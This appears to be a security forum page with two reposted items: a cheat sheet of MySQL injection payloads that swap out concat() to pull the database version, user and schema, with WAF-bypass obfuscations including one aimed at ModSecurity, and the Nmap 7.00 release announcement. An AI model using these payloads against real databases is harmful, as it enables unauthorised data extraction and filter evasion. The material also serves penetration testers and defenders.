  24. Nytro
    mysql injection concat() replacements @sergey_lakantar select export_set(1,version(),user(),' : ',2); 5.1.7 : my_user select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2); 5.1.7 : my_user : my_db select make_set(7,version(),user(),schema()); 5.1.7,my_user,my_db select replace(make_set(7,version(),user(),schema()),',',' : '); 5.1.7 : my_user : my_db select insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : '); 5.1.7 : my_user select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ')),length(schema())--1,0,' : '); 5.1.7 : my_user : my_db select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user()); 5.1.7 : my_user select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema()); 5.1.7 : my_user : my_db select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version()) 5.1.7 : my_user select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version()); 5.1.7 : my_user : my_db select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()); 5.1.7 : my_user select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema()); 5.1.7 : my_user : my_db group_concat() without comma- select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x); 5.1.7 : my_user : my_db concat() waf bypass- /*!50000group_coNcat(*/) /*!50000coNcat(*/) `coNcat`%0a%0b%0c%0d%a0() {snoopdogg concat()} {s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}} {s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}} {s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}} concat-- a%0a() concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a) concat/**x**/() Modsecurity- concat+() Link: concat() replacements - Pastebin.com
  25. Nytro
    Nmap 7 Released November 19, 2015 The Nmap Project is pleased to announce the immediate, free availability of the Nmap Security Scanner version 7.00 from https://nmap.org/. It is the product of three and a half years of work, nearly 3200 code commits, and more than a dozen point releases since the big Nmap 6 release in May 2012. Nmap turned 18 years old in September this year and celebrates its birthday with 171 new NSE scripts, expanded IPv6 support, world-class SSL/TLS analysis, and more user-requested features than ever. We recommend that all current users upgrade. Contents: About Nmap Top 7 Improvements in Nmap 7 Press Screen Shots Detailed Improvements Moving Forward (Future Plans) Acknowledgments Download and updates Top 7 Improvements in Nmap 7 Before we get into the detailed changes, here are the top 7 improvements in Nmap 7: 1. Major Nmap Scripting Engine (NSE) Expansion As the Nmap core has matured, more and more new functionality is developed as part of our NSE subsystem instead. In fact, we've added 171 new scripts and 20 libraries since Nmap 6. Examples include firewall-bypass, supermicro-ipmi-conf, oracle-brute-stealth, and ssl-heartbleed. And NSE is now powerful enough that scripts can take on core functions such as host discovery (dns-ip6-arpa-scan), version scanning (ike-version, snmp-info, etc.), and RPC grinding (rpc-grind). There's even a proposal to implement port scanning in NSE. [More Details] 2. Mature IPv6 support IPv6 scanning improvements were a big item in the Nmap 6 release, but Nmap 7 outdoes them all with full IPv6 support for CIDR-style address ranges, Idle Scan, parallel reverse-DNS, and more NSE script coverage. [More Details] 3. Infrastructure Upgrades We may be an 18-year-old project, but that doesn't mean we'll stick with old, crumbling infrastructure! The Nmap Project continues to adopt the latest technologies to enhance the development process and serve a growing user base. For example, we converted all of Nmap.Org to SSL to reduce the risk of trojan binaries and reduce snooping in general. We've also been using the Git version control system as a larger part of our workflow and have an official Github mirror of the Nmap Subversion source repository and we encourage code submissions to be made as Github pull requests. We also created an official bug tracker which is also hosted on Github. Tracking bugs and enhancement requests this way has already reduced the number which fall through the cracks. [More Details] 4. Faster Scans Nmap has continually pushed the speed boundaries of synchronous network scanning for 18 years, and this release is no exception. New Nsock engines give a performance boost to Windows and BSD systems, target reordering prevents a nasty edge case on multihomed systems, and NSE tweaks lead to much faster -sV scans. [More Details] 5. SSL/TLS scanning solution of choice Transport Layer Security (TLS) and its predecessor, SSL, are the security underpinning of the web, so when big vulnerabilities like Heartbleed, POODLE, and FREAK come calling, Nmap answers with vulnerability detection NSE scripts. The ssl-enum-ciphers script has been entirely revamped to perform fast analysis of TLS deployment problems, and version scanning probes have been tweaked to quickly detect the newest TLS handshake versions. [More Details] 6. Ncat Enhanced We are excited and proud to announce that Ncat has been adopted by the Red Hat/Fedora family of distributions as the default package to provide the "netcat" and "nc" commands! This cooperation has resulted in a lot of squashed bugs and enhanced compatibility with Netcat's options. Also very exciting is the addition of an embedded Lua interpreter for creating simple, cross-platform daemons and traffic filters. 7. Extreme Portability Nmap is proudly cross-platform and runs on all sorts of esoteric and archaic systems. But our binary distributions have to be kept up-to-date with the latest popular operating systems. Nmap 7 runs cleanly on Windows 10 all the way back to Windows Vista. By popular request, we even built it to run on Windows XP, though we suggest those users upgrade their systems. Mac OS X is supported from 10.8 Mountain Lion through 10.11 El Capitan. Plus, we updated support for Solaris and AIX. And Linux users—you have it easy. Link: https://nmap.org/7/
×
×
  • Create New...